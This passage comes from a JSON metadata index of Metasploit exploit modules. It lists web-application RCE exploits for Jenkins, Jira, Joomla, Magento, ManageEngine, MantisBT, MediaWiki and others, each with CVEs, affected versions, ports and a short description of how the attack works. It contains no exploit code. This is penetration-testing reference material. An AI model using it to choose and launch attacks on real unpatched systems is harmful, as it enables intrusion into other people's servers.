"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/jboss_seam_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/jboss_seam_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jenkins_metaprogramming": {
"name": "Jenkins ACL Bypass and Metaprogramming RCE",
"full_name": "exploit/multi/http/jenkins_metaprogramming",
"rank": 600,
"disclosure_date": "2019-01-08",
"type": "exploit",
"author": [
"Orange Tsai",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a vulnerability in Jenkins dynamic routing to\n bypass the Overall/Read ACL and leverage Groovy metaprogramming to\n download and execute a malicious JAR file.\n\n The ACL bypass gadget is specific to Jenkins <= 2.137 and will not work\n on later versions of Jenkins.\n\n Tested against Jenkins 2.137 and Pipeline: Groovy Plugin 2.61.",
"references": [
"CVE-2019-1003000",
"CVE-2019-1003001",
"CVE-2019-1003002",
"EDB-46427",
"URL-https://jenkins.io/security/advisory/2019-01-08/",
"URL-https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html",
"URL-https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
"URL-https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Jenkins <= 2.137 (Pipeline: Groovy Plugin <= 2.61)"
],
"mod_time": "2019-03-21 11:20:21 +0000",
"path": "/modules/exploits/multi/http/jenkins_metaprogramming.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_metaprogramming",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/jenkins_script_console": {
"name": "Jenkins-CI Script-Console Java Execution",
"full_name": "exploit/multi/http/jenkins_script_console",
"rank": 400,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Spencer McIntyre",
"jamcut",
"thesubtlety"
],
"description": "This module uses the Jenkins-CI Groovy script console to execute\n OS commands using Java.",
"references": [
"URL-https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux",
"Unix CMD"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/jenkins_script_console.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_script_console",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/jenkins_xstream_deserialize": {
"name": "Jenkins XStream Groovy classpath Deserialization Vulnerability",
"full_name": "exploit/multi/http/jenkins_xstream_deserialize",
"rank": 600,
"disclosure_date": "2016-02-24",
"type": "exploit",
"author": [
"Arshan Dabirsiaghi",
"Matt Byrne <attackdebris@gmail.com>"
],
"description": "This module exploits CVE-2016-0792, a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions\n older than 1.642.2, which is caused by unsafe deserialization in XStream with Groovy in the classpath,\n which allows remote arbitrary code execution. The issue affects default installations. Authentication\n is not required to exploit the vulnerability.",
"references": [
"CVE-2016-0792",
"URL-https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream",
"URL-https://wiki.jenkins.io/pages/viewpage.action?pageId=95585413"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd, python, x86, x64",
"rport": "8080",
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Python (In-Memory)",
"PowerShell (In-Memory)",
"Windows (CMD)",
"Linux (Dropper)",
"Windows (Dropper)"
],
"mod_time": "2018-02-26 16:59:36 +0000",
"path": "/modules/exploits/multi/http/jenkins_xstream_deserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/jenkins_xstream_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jira_hipchat_template": {
"name": "Atlassian HipChat for Jira Plugin Velocity Template Injection",
"full_name": "exploit/multi/http/jira_hipchat_template",
"rank": 600,
"disclosure_date": "2015-10-28",
"type": "exploit",
"author": [
"Chris Wood",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "Atlassian HipChat is a web service for internal instant messaging. A plugin is available\n for Jira that allows team collaboration at real time. A message can be used to inject Java\n code into a Velocity template, and gain code execution as Jira. Authentication is required\n to exploit this vulnerability, and you must make sure the account you're using isn't\n protected by captcha. By default, Java payload will be used because it is cross-platform,\n but you can also specify which native payload you want (Linux or Windows).\n\n HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions\n between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with\n a vulnerable copy of HipChat.\n\n When using the check command, if you supply a valid username and password, the module\n will be able to trigger the bug and check more accurately. If not, it falls back to\n passive, which can only tell if the target is running on a Jira version that is bundled\n with a vulnerable copy of HipChat by default, which is less reliable.\n\n This vulnerability was originally discovered internally by Atlassian.",
"references": [
"CVE-2015-5603",
"EDB-38551",
"BID-76698",
"URL-https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"HipChat for Jira plugin on Java",
"HipChat for Jira plugin on Windows",
"HipChat for Jira plugin on Linux"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/jira_hipchat_template.rb",
"is_install_path": true,
"ref_name": "multi/http/jira_hipchat_template",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/jira_plugin_upload": {
"name": "Atlassian Jira Authenticated Upload Code Execution",
"full_name": "exploit/multi/http/jira_plugin_upload",
"rank": 600,
"disclosure_date": "2018-02-22",
"type": "exploit",
"author": [
"Alexander Gonzalez(dubfr33)"
],
"description": "This module can be used to execute a payload on Atlassian Jira via\n the Universal Plugin Manager(UPM). The module requires valid login\n credentials to an account that has access to the plugin manager.\n The payload is uploaded as a JAR archive containing a servlet using\n a POST request against the UPM component. The check command will\n test the validity of user supplied credentials and test for access\n to the plugin manager.",
"references": [
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/",
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/",
"URL-https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/"
],
"platform": "Java",
"arch": "",
"rport": 2990,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal"
],
"mod_time": "2019-04-26 11:09:33 +0000",
"path": "/modules/exploits/multi/http/jira_plugin_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/jira_plugin_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/joomla_http_header_rce": {
"name": "Joomla HTTP Header Unauthenticated Remote Code Execution",
"full_name": "exploit/multi/http/joomla_http_header_rce",
"rank": 600,
"disclosure_date": "2015-12-14",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "Joomla suffers from an unauthenticated remote code execution vulnerability that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending a UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.",
"references": [
"CVE-2015-8562",
"EDB-38977",
"EDB-39033",
"URL-https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html",
"URL-https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html",
"URL-https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html",
"URL-https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/",
"URL-https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330",
"URL-https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html",
"URL-https://bugs.php.net/bug.php?id=70219"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Joomla 1.5.0 - 3.4.5"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/joomla_http_header_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/joomla_http_header_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/kordil_edms_upload_exec": {
"name": "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/kordil_edms_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-22",
"type": "exploit",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n This application has an upload feature that allows an unauthenticated user\n to upload arbitrary files to the '/kordil_edms/userpictures/' directory.",
"references": [
"OSVDB-90645",
"EDB-24547"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/http/kordil_edms_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/kordil_edms_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/lcms_php_exec": {
"name": "LotusCMS 3.0 eval() Remote Command Execution",
"full_name": "exploit/multi/http/lcms_php_exec",
"rank": 600,
"disclosure_date": "2011-03-03",
"type": "exploit",
"author": [
"dflah_ <dflah_@alligatorteam.org>",
"sherl0ck_ <sherl0ck_@alligatorteam.org>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Lotus CMS 3.0's Router()\n function. This is done by embedding PHP code in the 'page' parameter,\n which will be passed to a eval call, therefore allowing remote code execution.\n\n The module can either automatically pick up a 'page' parameter from the\n default page, or manually specify one in the URI option. To use the automatic\n method, please supply the URI with just a directory path, for example: \"/lcms/\".\n To manually configure one, you may do: \"/lcms/somepath/index.php?page=index\"",
"references": [
"CVE-2011-0518",
"OSVDB-75095",
"URL-http://secunia.com/secunia_research/2011-21/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic LotusCMS 3.0"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/lcms_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/lcms_php_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/log1cms_ajax_create_folder": {
"name": "Log1 CMS writeInfo() PHP Code Injection",
"full_name": "exploit/multi/http/log1cms_ajax_create_folder",
"rank": 600,
"disclosure_date": "2011-04-11",
"type": "exploit",
"author": [
"EgiX",
"Adel SBM",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits the \"Ajax File and Image Manager\" component that can be\n found in log1 CMS. In function.base.php of this component, the 'data' parameter\n in writeInfo() allows any malicious user to have direct control of writing data\n to file data.php, which results in arbitrary remote code execution.",
"references": [
"CVE-2011-4825",
"OSVDB-76928",
"EDB-18075",
"EDB-18151"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"log1 CMS 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/log1cms_ajax_create_folder.rb",
"is_install_path": true,
"ref_name": "multi/http/log1cms_ajax_create_folder",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/magento_unserialize": {
"name": "Magento 2.0.6 Unserialize Remote Code Execution",
"full_name": "exploit/multi/http/magento_unserialize",
"rank": 600,
"disclosure_date": "2016-05-17",
"type": "exploit",
"author": [
"Netanel Rubin",
"agix",
"mr_me <mr_me@offensive-security.com>"
],
"description": "This module exploits a PHP object injection vulnerability in Magento 2.0.6\n or prior.",
"references": [
"CVE-2016-4010",
"EDB-39838",
"URL-http://netanelrub.in/2016/05/17/magento-unauthenticated-remote-code-execution/",
"URL-http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/",
"URL-https://magento.com/security/patches/magento-206-security-update"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/magento_unserialize.rb",
"is_install_path": true,
"ref_name": "multi/http/magento_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/makoserver_cmd_exec": {
"name": "Mako Server v2.5, 2.6 OS Command Injection RCE",
"full_name": "exploit/multi/http/makoserver_cmd_exec",
"rank": 600,
"disclosure_date": "2017-09-03",
"type": "exploit",
"author": [
"John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure",
"Steven Patterson (Shogun Lab) <steven@shogunlab.com>"
],
"description": "This module exploits a vulnerability found in Mako Server v2.5, 2.6.\n It's possible to inject arbitrary OS commands in the Mako Server\n tutorial page through a PUT request to save.lsp.\n\n Attacker input will be saved on the victim's machine and can\n be executed by sending a GET request to manage.lsp.",
"references": [
"EDB-42683",
"URL-https://blogs.securiteam.com/index.php/archives/3391"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mako Server v2.5, 2.6"
],
"mod_time": "2017-11-15 15:00:47 +0000",
"path": "/modules/exploits/multi/http/makoserver_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/makoserver_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manage_engine_dc_pmp_sqli": {
"name": "ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection",
"full_name": "exploit/multi/http/manage_engine_dc_pmp_sqli",
"rank": 600,
"disclosure_date": "2014-06-08",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an unauthenticated blind SQL injection in LinkViewFetchServlet,\n which is exposed in ManageEngine Desktop Central v7 build 70200 to v9 build 90033 and\n Password Manager Pro v6 build 6500 to v7 build 7002 (including the MSP versions). The\n SQL injection can be used to achieve remote code execution as SYSTEM in Windows or as\n the user in Linux. This module exploits both PostgreSQL (newer builds) and MySQL (older\n or upgraded builds). MySQL targets are more reliable due to the use of relative paths;\n with PostgreSQL you should find the web root path via other means and specify it with\n WEB_ROOT.\n\n The injection is only exploitable via a GET request, which means that the payload\n has to be sent in chunks smaller than 8000 characters (URL size limitation). Small\n payloads and the use of exe-small is recommended, as you can only do between 10 and\n 20 injections before using up all the available ManagedConnections until the next\n server restart.\n\n This vulnerability exists in all versions released since 2006, however builds below\n DC v7 70200 and PMP v6 6500 do not ship with a JSP compiler. You can still try your\n luck using the MySQL targets as a JDK might be installed in the $PATH.",
"references": [
"CVE-2014-3996",
"OSVDB-110198",
"URL-https://seclists.org/fulldisclosure/2014/Aug/55"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Desktop Central v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows",
"Desktop Central MSP v8 >= b80200 / v9 < b90039 (PostgreSQL) on Windows",
"Desktop Central [MSP] v7 >= b70200 / v8 / v9 < b90039 (MySQL) on Windows",
"Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Windows",
"Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Windows",
"Password Manager Pro [MSP] v6 >= b6800 / v7 < b7003 (PostgreSQL) on Linux",
"Password Manager Pro v6 >= b6500 / v7 < b7003 (MySQL) on Linux"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/manage_engine_dc_pmp_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manageengine_auth_upload": {
"name": "ManageEngine Multiple Products Authenticated File Upload",
"full_name": "exploit/multi/http/manageengine_auth_upload",
"rank": 600,
"disclosure_date": "2014-12-15",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,\n AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts\n the upload does not correctly handle '../' sequences, which can be abused to write\n to the file system. Authentication is needed to exploit this vulnerability, but this module\n will attempt to login using the default credentials for the administrator and guest\n accounts. Alternatively, you can provide a pre-authenticated cookie or a username / password.\n For IT360 targets, enter the RPORT of the ServiceDesk instance (usually 8400). All\n versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,\n SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this\n module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has\n been tested successfully in Windows and Linux on several versions.",
"references": [
"CVE-2014-5301",
"OSVDB-116733",
"URL-https://seclists.org/fulldisclosure/2015/Jan/5"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9",
"ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1",
"IT360 v8-v10.4"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/manageengine_auth_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_auth_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/manageengine_sd_uploader": {
"name": "ManageEngine ServiceDesk Plus Arbitrary File Upload",
"full_name": "exploit/multi/http/manageengine_sd_uploader",
"rank": 600,
"disclosure_date": "2015-08-20",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n in Windows and Linux. The MSP versions do not expose the vulnerable servlet.",
"references": [
"ZDI-15-396",
"URL-https://github.com/rapid7/metasploit-framework/pull/6038"
],
"platform": "Java",
"arch": "java",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ServiceDesk Plus v9 b9000 - b9102 / Java Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/manageengine_sd_uploader.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_sd_uploader",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/manageengine_search_sqli": {
"name": "ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection",
"full_name": "exploit/multi/http/manageengine_search_sqli",
"rank": 600,
"disclosure_date": "2012-10-18",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>",
"sinn3r <sinn3r@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a SQL injection found in ManageEngine Security Manager Plus\n advanced search page, which results in remote code execution under the context of\n SYSTEM in Windows; or as the user in Linux. Authentication is not required in order\n to exploit this vulnerability.",
"references": [
"OSVDB-86562",
"EDB-22094",
"BID-56138"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 6262,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Linux"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/manageengine_search_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_search_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mantisbt_manage_proj_page_rce": {
"name": "Mantis manage_proj_page PHP Code Execution",
"full_name": "exploit/multi/http/mantisbt_manage_proj_page_rce",
"rank": 600,
"disclosure_date": "2008-10-16",
"type": "exploit",
"author": [
"EgiX",
"Lars Sorenson"
],
"description": "Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote\n Code Execution vulnerability in the sort parameter of the\n manage_proj_page.php page.",
"references": [
"EDB-6768",
"CVE-2008-4687"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Mantis <= 1.1.3"
],
"mod_time": "2018-05-09 11:50:07 +0000",
"path": "/modules/exploits/multi/http/mantisbt_manage_proj_page_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/mantisbt_manage_proj_page_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/mantisbt_php_exec": {
"name": "MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",
"full_name": "exploit/multi/http/mantisbt_php_exec",
"rank": 500,
"disclosure_date": "2014-11-08",
"type": "exploit",
"author": [
"Egidio Romano",
"Juan Escobar <eng.jescobar@gmail.com>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.\n The vulnerable code exists in plugins/XmlImportExport/ImportXml.php, which receives user input through the \"description\" field and the \"issuelink\" attribute of an uploaded XML file and passes them to the preg_replace() function with the /e modifier.\n This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.\n This version also suffers from another issue. The import page is not checking the correct user level\n of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.",
"references": [
"CVE-2014-7146",
"CVE-2014-8598",
"URL-https://www.mantisbt.org/bugs/view.php?id=17725",
"URL-https://www.mantisbt.org/bugs/view.php?id=17780"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mantisbt_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mantisbt_php_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/mediawiki_syntaxhighlight": {
"name": "MediaWiki SyntaxHighlight extension option injection vulnerability",
"full_name": "exploit/multi/http/mediawiki_syntaxhighlight",
"rank": 400,
"disclosure_date": "2017-04-06",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "This module exploits an option injection vulnerability in the SyntaxHighlight\n extension of MediaWiki. It tries to create & execute a PHP file in the document root.\n The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.\n\n This vulnerability affects any MediaWiki installation with SyntaxHighlight version 2.0\n installed & enabled. This extension ships with the AIO package of MediaWiki version\n 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and\n version 1.27.3.",
"references": [
"CVE-2017-0372",
"URL-https://lists.wikimedia.org/pipermail/mediawiki-announce/2017-April/000207.html",
"URL-https://phabricator.wikimedia.org/T158689",
"URL-https://securify.nl/advisory/SFY20170201/syntaxhighlight_mediawiki_extension_allows_injection_of_arbitrary_pygments_options.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/multi/http/mediawiki_syntaxhighlight.rb",
"is_install_path": true,
"ref_name": "multi/http/mediawiki_syntaxhighlight",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mediawiki_thumb": {
"name": "MediaWiki Thumb.php Remote Command Execution",
"full_name": "exploit/multi/http/mediawiki_thumb",
"rank": 600,
"disclosure_date": "2014-01-28",
"type": "exploit",
"author": [
"Netanel Rubin",
"Brandon Perry",
"Ben Harris",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\n users to execute arbitrary commands via shell metacharacters. If no target file\n is specified this module will attempt to log in with the provided credentials to\n upload a file (.DjVu) to use for exploitation.",
"references": [
"CVE-2014-1610",
"OSVDB-102630",
"URL-http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html",
"URL-https://bugzilla.wikimedia.org/show_bug.cgi?id=60339"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic PHP-CLI",
"Linux CMD",
"Windows CMD"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/mediawiki_thumb.rb",
"is_install_path": true,
"ref_name": "multi/http/mediawiki_thumb",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/metasploit_static_secret_key_base": {
"name": "Metasploit Web UI Static secret_key_base Value",
"full_name": "exploit/multi/http/metasploit_static_secret_key_base",
"rank": 600,
"disclosure_date": "2016-09-15",
"type": "exploit",
"author": [
"Justin Steven",
"joernchen of Phenoelit <joernchen@phenoelit.de>"
],
"description": "This module exploits the Web UI for Metasploit Community, Express and\n Pro where one of a certain set of Weekly Releases have been applied.\n These Weekly Releases introduced a static secret_key_base value.\n Knowledge of the static secret_key_base value allows for\n deserialization of a crafted Ruby Object, achieving code execution.\n\n This module is based on\n exploits/multi/http/rails_secret_deserialization",
"references": [
"OVE-20160904-0002",
"URL-https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401",
"URL-https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/metasploit_static_secret_key_base.rb",
"is_install_path": true,
"ref_name": "multi/http/metasploit_static_secret_key_base",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/metasploit_webui_console_command_execution": {
"name": "Metasploit Web UI Diagnostic Console Command Execution",
"full_name": "exploit/multi/http/metasploit_webui_console_command_execution",
"rank": 600,
"disclosure_date": "2016-08-23",
"type": "exploit",
"author": [
"Justin Steven"
],
"description": "This module exploits the \"diagnostic console\" feature in the Metasploit\n Web UI to obtain a reverse shell.\n\n The diagnostic console is able to be enabled or disabled by an\n administrator on Metasploit Pro and by an authenticated user on\n Metasploit Express and Metasploit Community. When enabled, the\n diagnostic console provides access to msfconsole via the web interface.\n An authenticated user can then use the console to execute shell\n commands.\n\n NOTE: Valid credentials are required for this module.\n\n Tested against:\n\n Metasploit Community 4.1.0,\n Metasploit Community 4.8.2,\n Metasploit Community 4.12.0",
"references": [
],
"platform": "",
"arch": "cmd",
"rport": 3790,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
